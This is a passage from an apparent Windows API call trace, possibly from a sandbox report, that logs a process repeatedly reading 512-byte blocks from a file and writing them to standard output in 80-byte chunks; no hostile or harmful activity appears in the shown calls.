out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.227] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.227] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.228] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, 
lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: 
lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.229] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.230] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] 
GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 
[0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.231] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.232] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType 
(hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.233] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.233] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] GetFileType (hFile=0x4c) returned 0x1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] GetFileType (hFile=0x4c) returned 0x1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] GetFileType (hFile=0x4c) returned 0x1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] GetFileType (hFile=0x4c) returned 0x1 